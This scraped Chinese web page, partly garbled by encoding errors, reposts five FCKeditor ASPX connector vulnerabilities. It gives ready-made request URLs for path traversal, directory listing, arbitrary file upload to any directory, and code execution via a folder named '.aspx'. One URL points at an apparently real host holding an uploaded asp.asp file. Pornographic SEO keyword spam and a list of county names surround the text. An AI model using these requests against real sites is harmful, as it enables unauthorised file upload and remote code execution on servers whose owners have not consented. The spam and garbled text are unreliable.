国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 網(wǎng)站 > 軟件應(yīng)用 > 正文

FCKeditor 新聞組件的一些程序漏洞

2024-09-06 19:16:32
字體:
供稿:網(wǎng)友
1 CurrentFolder 參數(shù),可以在網(wǎng)站中不同目錄新建文件夾,參數(shù)使用 ../../來篡改參數(shù),進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp


2 CurrentFolder 參數(shù),根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄,比如 “../../../”進入不同的目錄,讓后通過XML返回的消息就可以看到?jīng)]有權(quán)限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

3 上傳文件時,通過修改CurrentFolder參數(shù),可以將文件上傳到不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

4 同時修改Type 和CurrentFolder 參數(shù),可以上傳任意類型文件到網(wǎng)站任意目錄,基本上網(wǎng)站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp



5 通過創(chuàng)建文件夾的功能,創(chuàng)建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執(zhí)行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執(zhí)行。
發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 建水县| 黄陵县| 江陵县| 长顺县| 迁安市| 天镇县| 班戈县| 东乡| 余庆县| 乡城县| 昌平区| 娱乐| 黄龙县| 香港| 临沭县| 寿光市| 拉萨市| 江都市| 北辰区| 平乐县| 赤水市| 莱芜市| 鹿邑县| 循化| 大邑县| 玉溪市| 黄大仙区| 万宁市| 邹城市| 筠连县| 木里| 彰武县| 华安县| 施秉县| 思茅市| 新津县| 中方县| 扎鲁特旗| 东乡族自治县| 枣阳市| 嘉善县|